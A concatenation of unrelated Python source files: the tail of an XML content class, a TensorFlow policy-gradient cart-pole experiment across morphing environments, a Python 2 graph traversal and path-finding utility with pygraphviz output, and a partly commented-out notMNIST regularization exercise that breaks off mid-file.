for sentence in self.sentence_objects:
if sentence.md5sum in sentence_dict:
new_sentence = sentence_dict[sentence.md5sum]
for attrib in SENTENCE_ATTRIBUTES:
new_value = getattr(new_sentence, attrib)
if new_value:
setattr(sentence, attrib, new_value)
all_sentences = property(get_all_sentences, update_sentences)
sentences = property(get_sentences, update_sentences)
plain_text = property(get_plain_text)
nilsimsa = property(get_nilsimsa)
content_type = property(get_content_type)
title = property(get_title)
lang = property(get_lang)
content_id = property(get_content_id)
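def _apply_dict_mapping_example():
    '''
    Illustrative sketch only: apply_dict_mapping renames the keys listed in
    the mapping and drops everything else, so {'lang': 'en', 'foo': 1} with
    the mapping {'lang': 'xml:lang'} becomes {'xml:lang': 'en'}.
    '''
    return XMLContent.apply_dict_mapping({'lang': 'en', 'foo': 1},
                                         {'lang': 'xml:lang'})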
|
|
import tensorflow as tf # neural network for function approximation
import gym # environment
import numpy as np # matrix operation and math functions
from gym import wrappers
import gym_morph # customized environment for cart-pole
import matplotlib.pyplot as plt
import time
# Hyperparameters
RANDOM_NUMBER_SEED = 1
# ENVIRONMENT = "CartPole-v0"
# ENVIRONMENT = "CartPole-v1"
ENVIRONMENT1 = "morph-v0"
ENVIRONMENT2 = "morph-l6-v0"
ENVIRONMENT3 = "morph-l8-v0"
ENVIRONMENT4 = "morph-l10-v0"
# ENVIRONMENT5 = "morph-l7-v0"
MAX_EPISODES = 100 # number of episodes before morphing (or after it)
HIDDEN_LAYER = True
HIDDEN_SIZE = 6
DISPLAY_WEIGHTS = False # Help debug weight update
gamma = 0.99 # Discount per step
alpha = 0.01 # Learning rate
RENDER = False # Render the cart-pole system
VIDEO_INTERVAL = 100 # Generate a video at this interval
CONSECUTIVE_TARGET = 50 # Including previous 50 rewards
env = gym.make(ENVIRONMENT1)
env.seed(RANDOM_NUMBER_SEED)
np.random.seed(RANDOM_NUMBER_SEED)
tf.set_random_seed(RANDOM_NUMBER_SEED)
# Input and output sizes
input_size = env.observation_space.shape[0]
# try:
# output_size = env.action_space.shape[0]
# except AttributeError:
# output_size = env.action_space.n
output_size = env.action_space.n
# Tensorflow network setup
x = tf.placeholder(tf.float32, shape=(None, input_size))
y = tf.placeholder(tf.float32, shape=(None, 1))
expected_returns = tf.placeholder(tf.float32, shape=(None, 1))
# Xavier (2010) weights initializer for uniform distribution:
# x = sqrt(6. / (in + out)); [-x, x]
w_init = tf.contrib.layers.xavier_initializer()
if HIDDEN_LAYER:
hidden_W = tf.get_variable("W1", shape=[input_size, HIDDEN_SIZE],
initializer=w_init)
hidden_B = tf.Variable(tf.zeros(HIDDEN_SIZE))
dist_W = tf.get_variable("W2", shape=[HIDDEN_SIZE, output_size],
initializer=w_init)
dist_B = tf.Variable(tf.zeros(output_size))
hidden = tf.nn.elu(tf.matmul(x, hidden_W) + hidden_B)
dist = tf.tanh(tf.matmul(hidden, dist_W) + dist_B)
else:
dist_W = tf.get_variable("W1", shape=[input_size, output_size],
initializer=w_init)
dist_B = tf.Variable(tf.zeros(output_size))
dist = tf.tanh(tf.matmul(x, dist_W) + dist_B)
dist_soft = tf.nn.log_softmax(dist)
dist_in = tf.matmul(dist_soft, tf.Variable([[1.], [0.]]))
pi = tf.contrib.distributions.Bernoulli(dist_in)
pi_sample = pi.sample()
log_pi = pi.log_prob(y)
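# Illustrative sketch (plain numpy, not part of the graph): dist_soft is the
# log-softmax over the two action outputs, and multiplying by [[1.], [0.]]
# selects its first column, i.e. the log-probability of action 0, which is the
# value handed to the Bernoulli policy above.
def _log_softmax_col0(logits_row):
    z = np.asarray(logits_row, dtype=np.float64)
    z = z - z.max()  # subtract the max for numerical stability
    return (z - np.log(np.exp(z).sum()))[0]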
optimizer = tf.train.RMSPropOptimizer(alpha)
# global_step = tf.Variable()
# optimizer = tf.train.RMSPropOptimizer(alpha)
train = optimizer.minimize(-1.0 * expected_returns * log_pi)
# saver = tf.train.Saver()
# Create and initialize a session
sess = tf.Session()
sess.run(tf.global_variables_initializer())
def run_episode(environment, ep, render=False):
raw_reward = 0
discounted_reward = 0
cumulative_reward = []
discount = 1.0
states = []
actions = []
obs = environment.reset()
done = False
while not done:
states.append(obs)
cumulative_reward.append(discounted_reward)
if render and ((ep % VIDEO_INTERVAL) == 0):
environment.render()
action = sess.run(pi_sample, feed_dict={x: [obs]})[0]
actions.append(action)
        obs, reward, done, info = environment.step(action[0])
raw_reward += reward
if reward > 0:
discounted_reward += reward * discount
else:
discounted_reward += reward
discount *= gamma
return raw_reward, discounted_reward, cumulative_reward, states, actions
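# Illustrative sketch (not called by the training loops below): how the value
# fed to `expected_returns` is formed. run_episode returns the total
# discounted return and the discounted reward accumulated *before* each step,
# so their difference is the discounted reward still to come from that step
# (the reward-to-go used to weight the log-probabilities).
def _reward_to_go_example():
    discounted_G = 3.0
    cumulative_G = [0.0, 1.0, 1.9]  # discounted reward collected before each step
    expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
    return expected_R  # [[3.0], [2.0], [1.1]]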
def display_weights(session):
global HIDDEN_LAYER
if HIDDEN_LAYER:
w1 = session.run(hidden_W)
b1 = session.run(hidden_B)
w2 = session.run(dist_W)
b2 = session.run(dist_B)
print(w1, b1, w2, b2)
else:
w1 = session.run(dist_W)
b1 = session.run(dist_B)
print(w1, b1)
returns_1 = []
mean_1 = []
for ep in range(MAX_EPISODES):
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, ep, RENDER)
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
# saver.save(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
returns_1.append(raw_G)
running_returns = returns_1[max(0, ep-CONSECUTIVE_TARGET):(ep+1)]
mean_returns = np.mean(running_returns)
mean_1.append(mean_returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep+1, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
env.close()
env = gym.make(ENVIRONMENT2)
env.seed(RANDOM_NUMBER_SEED)
# print("---------- MORPHING ----------")
# time.sleep(3)
returns_2 = []
mean_2 = []
for ep in range(MAX_EPISODES):
# saver.restore(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, ep, RENDER)
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
# saver.save(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
returns_2.append(raw_G)
running_returns = returns_2[max(0, ep-CONSECUTIVE_TARGET):(ep+1)]
mean_returns = np.mean(running_returns)
mean_2.append(mean_returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep+MAX_EPISODES+1, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
env.close()
env = gym.make(ENVIRONMENT3)
env.seed(RANDOM_NUMBER_SEED)
returns_3 = []
mean_3 = []
for ep in range(MAX_EPISODES):
# saver.restore(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, ep, RENDER)
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
# saver.save(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
returns_3.append(raw_G)
running_returns = returns_3[max(0, ep-CONSECUTIVE_TARGET):(ep+1)]
mean_returns = np.mean(running_returns)
mean_3.append(mean_returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep+MAX_EPISODES*2+1, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
env.close()
env = gym.make(ENVIRONMENT4)
env.seed(RANDOM_NUMBER_SEED)
returns_4 = []
mean_4 = []
for ep in range(MAX_EPISODES):
# saver.restore(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, ep, RENDER)
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
# saver.save(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
returns_4.append(raw_G)
running_returns = returns_4[max(0, ep-CONSECUTIVE_TARGET):(ep+1)]
mean_returns = np.mean(running_returns)
mean_4.append(mean_returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep+MAX_EPISODES*3+1, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
returns_for_plot = np.concatenate((mean_1, mean_2, mean_3, mean_4), axis=0)
env.close()
env = gym.make(ENVIRONMENT4)
env.seed(RANDOM_NUMBER_SEED)
np.random.seed(RANDOM_NUMBER_SEED)
tf.set_random_seed(RANDOM_NUMBER_SEED)
returns_direct = []
mean_direct = []
sess.run(tf.global_variables_initializer())
for ep in range(MAX_EPISODES*4):
# saver.restore(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
if ep % MAX_EPISODES == 0:
sess.run(tf.global_variables_initializer())
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, ep, RENDER)
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
# saver.save(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
returns_direct.append(raw_G)
running_returns = returns_direct[max(0, ep-CONSECUTIVE_TARGET):(ep+1)]
mean_returns = np.mean(running_returns)
mean_direct.append(mean_returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep+1, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
# Plot
plt.style.use('ggplot')
# plt.style.use('dark_background')
# Instant returns
# returns_for_plot = np.concatenate((returns_before_morph, returns_after_morph), axis=0)
# Mean returns
fig = plt.figure()
ax = fig.add_subplot(111)
fig.subplots_adjust(top=0.85)
ax.set_title("Pole Balancing with Morphing")
ax.set_xlabel("Episode")
ax.set_ylabel("Returns (Running Average)")
ax.plot(returns_for_plot, label='With Previous Experience')
ax.plot(mean_direct, label='Without Previous Experience')
# ax.axvline(x=MAX_EPISODES, linestyle='--')
ax.set_ylim((0, 220))
# ax.text(0, 25, "Parameters before morphing:\n \
# Pole length = 1.0 m \n \
# Pole mass = 0.1 kg \n \
# Cart mass = 1.0 kg \n \
# Force magnitude = 10 N", \
# bbox={'facecolor':(.118,.565,1.000, .3)})
# ax.text(MAX_EPISODES*21.0/20.0, 25, "Parameters after morphing:\n \
# Pole length = 1.25 m \n \
# Pole mass = 0.1 kg \n \
# Cart mass = 1.0 kg \n \
# Force magnitude = 10 N", \
# bbox={'facecolor':(.118,.565,1.000, .3)})
ax.axvline(x=MAX_EPISODES, linestyle='--', color='black')
ax.axvline(x=MAX_EPISODES*2, linestyle='--', color='black')
ax.axvline(x=MAX_EPISODES*3, linestyle='--', color='black')
ax.legend(loc='best')
# ax.annotate('Morphing', xy=(MAX_EPISODES, 100), \
# xytext=(MAX_EPISODES*6.0/5.0, 125), \
# arrowprops=dict(facecolor=(.118,.565,1.000, .3)))
# fig.savefig('/home/yh/repo/sim_test/Feb/CartPoleData/3p0.jpg')
plt.show()
|
|
#!/usr/bin/env python
# coding=utf-8
import pygraphviz as pgv
from pdb import *
gdata = [
['A', '->', 'B',1],
['A', '->', 'C',1],
['B', '->', 'C',1],
['B', '->', 'D',1],
['C', '->', 'D',1],
['D', '->', '',1],
]
graph = {
'A': ['B', 'C'],
'B': ['C', 'D'],
'C': ['D'],
'D':[]
}
def gen_edge_relations(graph):
graph_edge = {}
for node,neighbour_list in graph.iteritems():
node_relations = {}
for nb in neighbour_list:
node_relations[nb] = 1
#print node,neighbour_list,node_relations
if not graph_edge.has_key(node):
graph_edge[node] = node_relations
return graph_edge
def check_is_edge(graph_edge,_from,_to):
is_edge = False
if len(graph_edge)>0:
if graph_edge.has_key(_from):
node_relations = graph_edge[_from]
if node_relations.has_key(_to):
is_edge = True
return is_edge
def width_order_graph(graph):
graph_edge = gen_edge_relations(graph)
def BFS(node):
print(node)
visited[node] = 1
for _node,_node_relations in graph.iteritems():
if check_is_edge(graph_edge,node,_node) and not visited.has_key(_node):
BFS(_node)
visited = {}
#set_trace()
for node,node_relations in graph.iteritems():
if not visited.has_key(node):
print 'start BFS:',node
BFS(node)
print visited
def depth_order_graph(graph):
graph_edge = gen_edge_relations(graph)
def DFS(node,queue):
queue.append(node)
print(node)
visited[node] = 1
if len(queue) != 0:
q_node = queue.pop()
for _node,_node_relations in graph.iteritems():
if check_is_edge(graph_edge,q_node,_node) and not visited.has_key(_node):
DFS(_node, queue)
visited = {}
queue = []
for node,node_relations in graph.iteritems():
if not visited.has_key(node):
DFS(node,queue)
def build_graph(data):
graph = {}
    for r in data:
_from = r[0]
to = r[2]
status = r[3]
if status!=1:
continue
if not graph.has_key(_from):
graph[_from] = [to]
else:
graph[_from].append(to)
return graph
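# Illustrative sketch: build_graph(gdata) with the sample data above yields
# {'A': ['B', 'C'], 'B': ['C', 'D'], 'C': ['D'], 'D': ['']} -- note the
# empty-string target coming from the ['D', '->', '', 1] row.
def _build_graph_example():
    return build_graph(gdata)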
def add_node(graph,_from,to):
#set_trace()
if len(graph)>0:
if not graph.has_key(_from):
graph[_from] = [to]
else:
graph[_from].append(to)
#fix add leaf node
if not graph.has_key(to):
graph[to] = []
else:
graph[_from] =[to]
return graph
def del_node(graph,_from,to):
if len(graph)>0:
#del edge
if graph.has_key(_from):
graph[_from].remove(to)
#del to -if leaf
if graph.has_key(to):
t = graph[to]
if len(t)==0:
graph.pop(to)
return graph
def find_path(graph, start, end, path=[]):
path = path + [start]
if start == end:
return path
if not graph.has_key(start):
return None
for node in graph[start]:
if node not in path:
newpath = find_path(graph, node, end, path)
if newpath:
return newpath
return None
def find_path2 (graph, start, end, path=[]):
_path = path + [start]
if start == end:
return path
if not graph.has_key(start):
return None
for node in graph[start]:
if node not in _path:
newpath = find_path(graph, node, end, _path)
if newpath:
return newpath
return None
def find_all_paths(graph, start, end, path=[]):
path = path + [start]
if start == end:
return [path]
if not graph.has_key(start):
return []
paths = []
for node in graph[start]:
if node not in path:
newpaths = find_all_paths(graph, node, end, path)
for newpath in newpaths:
paths.append(newpath)
return paths
"""
find the direct predecessors of 'to' (every node with an edge node -> 'to')
"""
def find_from_path(graph,to):
path = []
graph_edge = gen_edge_relations(graph)
for node,node_relations in graph_edge.iteritems():
if node_relations.has_key(to):
path.append(node)
return path
"""
find all ancestors of 'to' (every node x with a path x -> ... -> 'to'); 'to' itself is returned as the first element
"""
def find_from_path_all(graph,to,path=[]):
if to not in path:
path = path+[to]
#print path,to in path
graph_edge = gen_edge_relations(graph)
for node,node_relations in graph_edge.iteritems():
if node_relations.has_key(to):
if not node in path:
path.append(node)
find_from_path_all(graph,node,path)
return path
"""
find all ancestors of 'to' with an explicit depth-first search; returns the visited dict
"""
def find_from_path_all_depth_order_graph(graph,to):
graph_edge = gen_edge_relations(graph)
def DFS(node,queue):
queue.append(node)
#print(node)
if len(queue) != 0:
q_node = queue.pop()
for _node,_node_relations in graph_edge.iteritems():
if _node_relations.has_key(q_node) and not visited.has_key(_node):
visited[_node] = 1
#visited[_node] = 1
DFS(_node, queue)
visited = {}
queue = []
node = to
DFS(node,queue)
return visited
"""
find '_from' and all nodes reachable from it (its descendants) with a depth-first search; returns the visited dict
"""
def find_to_path_all_depth_order_graph(graph,_from):
def DFS(node,queue):
queue.append(node)
print(node)
visited[node]=1
if len(queue) != 0:
q_node = queue.pop()
for neighbour in graph[q_node]:
queue.append(neighbour)
#if graph.has_key(neighbour) and not visited.has_key(neighbour):
if graph.has_key(neighbour):
DFS(neighbour,queue)
visited = {}
queue = []
node = _from
DFS(node,queue)
return visited
def find_shortest_path(graph, start, end, path=[]):
path = path + [start]
if start == end:
return path
if not graph.has_key(start):
return None
shortest = None
for node in graph[start]:
if node not in path:
newpath = find_shortest_path(graph, node, end, path)
if newpath:
if not shortest or len(newpath) < len(shortest):
shortest = newpath
return shortest
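# Illustrative sketch using the sample `graph` defined at the top of this file:
# find_path returns the first path found (['A', 'B', 'C', 'D']),
# find_all_paths returns all three A-to-D paths, and
# find_shortest_path returns a shortest one such as ['A', 'B', 'D'].
def _path_finding_example():
    return (find_path(graph, 'A', 'D'),
            find_all_paths(graph, 'A', 'D'),
            find_shortest_path(graph, 'A', 'D'))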
def gen_graph_png(graph,file_name):
A=pgv.AGraph(directed=True,strict=True)
for node,node_relations_list in graph.iteritems():
for neighbour in node_relations_list:
A.add_edge(node,neighbour)
A.graph_attr['epsilon']='0.1'
print A.string() # print dot file to standard output
A.write(file_name+'.dot')
A.layout('dot') # layout with dot
A.draw(file_name+'.gif') # write to file
print 'success'
def graph_tree_test():
A=pgv.AGraph(directed=True,strict=True)
A.node_attr['style']='filled'
A.node_attr['shape']='circle'
A.node_attr['fixedsize']='true'
A.node_attr['fontcolor']='#FFFFFF'
A.add_edge(1,2)
A.add_edge(1,3)
A.add_edge(2,4)
A.add_edge(2,5)
A.add_edge(5,6)
A.add_edge(5,7)
A.add_edge(3,8)
A.add_edge(3,9)
A.add_edge(8,10)
A.add_edge(8,11)
A.graph_attr['epsilon']='0.001'
print A.string() # print dot file to standard output
A.write('tree.dot')
A.layout('dot') # layout with dot
A.draw('tree.png') # write to file
print 'success'
def test_find(graph):
print '--find A-E one path--'
t= find_path(graph, 'A', 'E')
print t
t= find_path2(graph, 'A', 'E')
print t
print '--find A-E all paths-'
t = find_all_paths(graph, 'A', 'E')
print t
print '--find A-E short path-'
t= find_shortest_path(graph, 'A', 'E')
print t
def test_find_from_path(graph):
print '--find from node directly--'
t=find_from_path(graph,'D')
print t
print '--find_from_path_all--'
t = find_from_path_all(graph,'D')
print t
t = find_from_path_all_depth_order_graph(graph,'D')
print t
t = find_to_path_all_depth_order_graph(graph,'A')
print t
print graph
def test_update(graph):
graph = add_node(graph,'D','E')
print graph
"""
{'A': ['B', 'C'], 'C': ['D'], 'B': ['C', 'D'], 'D': ['E']}
"""
print '--add_node-E-F-'
graph = add_node(graph,'E','F')
print '--del_node leaf-E-F'
del_node(graph,'E','F')
print graph
print '--del_node leaf-C-D'
del_node(graph,'C','D')
print graph
print '--del_node leaf-B-D'
del_node(graph,'B','D')
print graph
depth_order_graph(graph)
def test_order(graph):
print '--width_order_graph--'
width_order_graph(graph)
print '--depth_order_graph--'
depth_order_graph(graph)
def test_utils(graph):
g = build_graph(gdata)
print g
print '--gen all graph_edge relations-'
graph_edge = gen_edge_relations(graph)
print graph_edge
print '--check_is_edge--'
t= check_is_edge(graph_edge,'A','B')
print t
if __name__=='__main__':
#test_find_from_path(graph)
#graph_tree_test()
gen_graph_png(graph,'path')
|
|
# These are all the modules we'll be using later. Make sure you can import them
# before proceeding further.
from __future__ import print_function
import numpy as np
import tensorflow as tf
from six.moves import cPickle as pickle
# pickle_file = 'notMNIST.pickle'
pickle_file = 'notMNIST_santinized.pickle'
with open(pickle_file, 'rb') as f:
save = pickle.load(f)
train_dataset = save['train_dataset']
train_labels = save['train_labels']
valid_dataset = save['valid_dataset']
valid_labels = save['valid_labels']
test_dataset = save['test_dataset']
test_labels = save['test_labels']
del save # hint to help gc free up memory
print('Training set', train_dataset.shape, train_labels.shape)
print('Validation set', valid_dataset.shape, valid_labels.shape)
print('Test set', test_dataset.shape, test_labels.shape)
image_size = 28
num_labels = 10
def reformat(dataset, labels):
dataset = dataset.reshape((-1, image_size**2)).astype(np.float32)
labels = (np.arange(num_labels) == labels[:, np.newaxis]).astype(np.float32)
return dataset, labels
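# Illustrative sketch of the one-hot trick used in reformat(): comparing the
# label column vector against arange(num_labels) broadcasts into a one-hot
# matrix, one row per example.
def _one_hot_example():
    labels = np.array([0, 2, 1])
    return (np.arange(3) == labels[:, np.newaxis]).astype(np.float32)
    # [[1, 0, 0], [0, 0, 1], [0, 1, 0]]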
train_dataset, train_labels = reformat(train_dataset, train_labels)
valid_dataset, valid_labels = reformat(valid_dataset, valid_labels)
test_dataset, test_labels = reformat(test_dataset, test_labels)
print('Training set', train_dataset.shape, train_labels.shape)
print('Validation set', valid_dataset.shape, valid_labels.shape)
print('Test set', test_dataset.shape, test_labels.shape)
## problem 1
# without regularization.
# train 82.8%
# CV 82.3%
# test 89.0%
# # With gradient descent training, even this much data is prohibitive.
# # Subset the training data for faster turnaround.
# train_subset = 10000
#
# graph = tf.Graph()
# with graph.as_default():
#
# # Input data.
# # Load the training, validation and test data into constants that are
# # attached to the graph.
# tf_train_dataset = tf.constant(train_dataset[:train_subset, :])
# tf_train_labels = tf.constant(train_labels[:train_subset])
# tf_valid_dataset = tf.constant(valid_dataset)
# tf_test_dataset = tf.constant(test_dataset)
#
# # Variables.
# # These are the parameters that we are going to be training. The weight
# # matrix will be initialized using random values following a (truncated)
# # normal distribution. The biases get initialized to zero.
# weights = tf.Variable(
# tf.truncated_normal([image_size * image_size, num_labels]))
# biases = tf.Variable(tf.zeros([num_labels]))
#
# # Training computation.
# # We multiply the inputs with the weight matrix, and add biases. We compute
# # the softmax and cross-entropy (it's one operation in TensorFlow, because
# # it's very common, and it can be optimized). We take the average of this
# # cross-entropy across all training examples: that's our loss.
# logits = tf.matmul(tf_train_dataset, weights) + biases # the model outputs before softmax are called logits.
# loss = tf.reduce_mean(
# tf.nn.softmax_cross_entropy_with_logits(logits, tf_train_labels))
#
# # Optimizer.
# # We are going to find the minimum of this loss using gradient descent.
# optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss) # optimizer is the same thing to solver in sklearn
#
# # Predictions for the training, validation, and test data.
# # These are not part of training, but merely here so that we can report
# # accuracy figures as we train.
# train_prediction = tf.nn.softmax(logits)
# valid_prediction = tf.nn.softmax(
# tf.matmul(tf_valid_dataset, weights) + biases)
# test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)
#
#
# num_steps = 801
#
#
# def accuracy(predictions, labels):
# return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1))# along axis=1 means by row.
# / predictions.shape[0])
#
#
# with tf.Session(graph=graph) as session:
# # This is a one-time operation which ensures the parameters get initialized as
# # we described in the graph: random weights for the matrix, zeros for the
# # biases.
# tf.global_variables_initializer().run()
# print('Initialized')
# for step in range(num_steps):
# # Run the computations. We tell .run() that we want to run the optimizer,
# # and get the loss value and the training predictions returned as numpy
# # arrays.
# _, l, predictions = session.run([optimizer, loss, train_prediction])
# if (step % 100 == 0):
# print('Loss at step %d: %f' % (step, l))
# print('Training accuracy: %.1f%%' % accuracy(
# predictions, train_labels[:train_subset, :]))
# # Calling .eval() on valid_prediction is basically like calling run(), but
# # just to get that one numpy array. Note that it recomputes all its graph
# # dependencies.
# print('Validation accuracy: %.1f%%' % accuracy(
# valid_prediction.eval(), valid_labels))
# print('Test accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))
#
#
# grid_lambda = np.array([1.0, 0.3, 0.1, 0.03, 0.01])
# train_subset = 10000
#
# for regular_lambda in grid_lambda:
# print('\nregularization coefficient: ', regular_lambda)
# graph = tf.Graph()
# with graph.as_default():
#
# # Input data.
# # Load the training, validation and test data into constants that are
# # attached to the graph.
# tf_train_dataset = tf.constant(train_dataset[:train_subset, :])
# tf_train_labels = tf.constant(train_labels[:train_subset])
# tf_valid_dataset = tf.constant(valid_dataset)
# tf_test_dataset = tf.constant(test_dataset)
#
# # Variables.
# # These are the parameters that we are going to be training. The weight
# # matrix will be initialized using random values following a (truncated)
# # normal distribution. The biases get initialized to zero.
# weights = tf.Variable(
# tf.truncated_normal([image_size * image_size, num_labels]))
# biases = tf.Variable(tf.zeros([num_labels]))
#
# # Training computation.
# # We multiply the inputs with the weight matrix, and add biases. We compute
# # the softmax and cross-entropy (it's one operation in TensorFlow, because
# # it's very common, and it can be optimized). We take the average of this
# # cross-entropy across all training examples: that's our loss.
# logits = tf.matmul(tf_train_dataset, weights) + biases # the model outputs before softmax are called logits.
# loss = tf.reduce_mean(
# tf.nn.softmax_cross_entropy_with_logits(logits, tf_train_labels)
# + regular_lambda*tf.nn.l2_loss(weights))
#
# # Optimizer.
# # We are going to find the minimum of this loss using gradient descent.
# optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(
# loss) # optimizer is the same thing to solver in sklearn
#
# # Predictions for the training, validation, and test data.
# # These are not part of training, but merely here so that we can report
# # accuracy figures as we train.
# train_prediction = tf.nn.softmax(logits)
# valid_prediction = tf.nn.softmax(
# tf.matmul(tf_valid_dataset, weights) + biases)
# test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)
#
# num_steps = 801
#
#
# def accuracy(predictions, labels):
# return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1)) # along axis=1 means by row.
# / predictions.shape[0])
#
#
# with tf.Session(graph=graph) as session:
# # This is a one-time operation which ensures the parameters get initialized as
# # we described in the graph: random weights for the matrix, zeros for the
# # biases.
# tf.global_variables_initializer().run()
# print('Initialized')
# for step in range(num_steps):
# # Run the computations. We tell .run() that we want to run the optimizer,
# # and get the loss value and the training predictions returned as numpy
# # arrays.
# _, l, predictions = session.run([optimizer, loss, train_prediction])
# if (step % 100 == 0):
# print('Loss at step %d: %f' % (step, l))
# print('Training accuracy: %.1f%%' % accuracy(
# predictions, train_labels[:train_subset, :]))
# # Calling .eval() on valid_prediction is basically like calling run(), but
# # just to get that one numpy array. Note that it recomputes all its graph
# # dependencies.
# print('Validation accuracy: %.1f%%' % accuracy(
# valid_prediction.eval(), valid_labels))
# print('Test accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))
#
# ## SGD with logistic regression (LR); cf. solver='sag' in sklearn.
# grid_lambda = np.array([1.0, 0.3, 0.1, 0.03, 0.01, 0.003, 0.001])
#
# batch_size = 128
# for regular_lambda in grid_lambda:
# print('regularization coefficient:', regular_lambda)
# graph = tf.Graph()
# with graph.as_default():
#
# # Input data. For the training data, we use a placeholder that will be fed
# # at run time with a training minibatch.
# tf_train_dataset = tf.placeholder(tf.float32,
# shape=(batch_size, image_size * image_size))
# tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))
# tf_valid_dataset = tf.constant(valid_dataset)
# tf_test_dataset = tf.constant(test_dataset)
#
# # Variables.
# weights = tf.Variable(
# tf.truncated_normal([image_size * image_size, num_labels]))
# biases = tf.Variable(tf.zeros([num_labels]))
#
# # Training computation.
# logits = tf.matmul(tf_train_dataset, weights) + biases
#
# # add regularization into loss
# loss = tf.reduce_mean(
# tf.nn.softmax_cross_entropy_with_logits(logits, tf_train_labels)
# + regular_lambda*tf.nn.l2_loss(weights))
#
# # Optimizer.
# optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)
#
# # Predictions for the training, validation, and test data.
# train_prediction = tf.nn.softmax(logits)
# valid_prediction = tf.nn.softmax(
# tf.matmul(tf_valid_dataset, weights) + biases)
# test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)
#
# num_steps = 3001
#
#
# def accuracy(predictions, labels):
# return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1)) # along axis=1 means by row.
# / predictions.shape[0])
#
#
# with tf.Session(graph=graph) as session:
# tf.global_variables_initializer().run()
# print("Initialized")
# for step in range(num_steps):
# # Pick an offset within the training data, which has been randomized.
# # Note: we could use better randomization across epochs.
# offset = (step * batch_size) % (train_labels.shape[0] - batch_size)
# # Generate a minibatch.
# batch_data = train_dataset[offset:(offset + batch_size), :]
# batch_labels = train_labels[offset:(offset + batch_size), :]
# # Prepare a dictionary telling the session where to feed the minibatch.
# # The key of the dictionary is the placeholder node of the graph to be fed,
# # and the value is the numpy array to feed to it.
# feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels}
# _, l, predictions = session.run(
# [optimizer, loss, train_prediction], feed_dict=feed_dict)
# if (step % 500 == 0):
# print("Minibatch loss at step %d: %f" % (step, l))
# print("Minibatch accuracy: %.1f%%" % accuracy(predictions, batch_labels))
# print("Validation accuracy: %.1f%%" % accuracy(
# valid_prediction.eval(), valid_labels))
# print("Test accuracy: %.1f%%" % accuracy(test_prediction.eval(), test_labels))
# best hyper-parameters [0.001, 0.001]
# Minibatch accuracy: 85.2%
# Validation accuracy: 87.1%
# Testing accuracy: 93.1%
# learning rate decay
# Minibatch accuracy: 83.6%
# Validation accuracy: 84.9%
# Testing accuracy: 91.3%
# dropout
# Minibatch accuracy: 73.4%
# Validation accuracy: 84.8%
# Testing accuracy: 91.3%
#
# grid_lambda = np.array([0.001])
# # batch_size = 50 # test for dropout
# batch_size = 128
# h1_length = 1024
# num_steps = 3001
# for regular_lambda1 in grid_lambda:
# for regular_lambda2 in grid_lambda:
# print('\nregularization coefficient:(%f, %f)' % (regular_lambda1, regular_lambda2))
# graph = tf.Graph()
# with graph.as_default():
# keep_prob = tf.placeholder(dtype=tf.float32, shape=())
# tf_train_dataset = tf.placeholder(dtype=tf.float32, shape=(batch_size, image_size**2))
# tf_train_labels = tf.placeholder(dtype=tf.float32, shape=(batch_size, num_labels))
# tf_valid_dataset = tf.constant(valid_dataset)
# tf_test_dataset = tf.constant(test_dataset)
#
# global_step = tf.Variable(0) # count the number of steps taken.
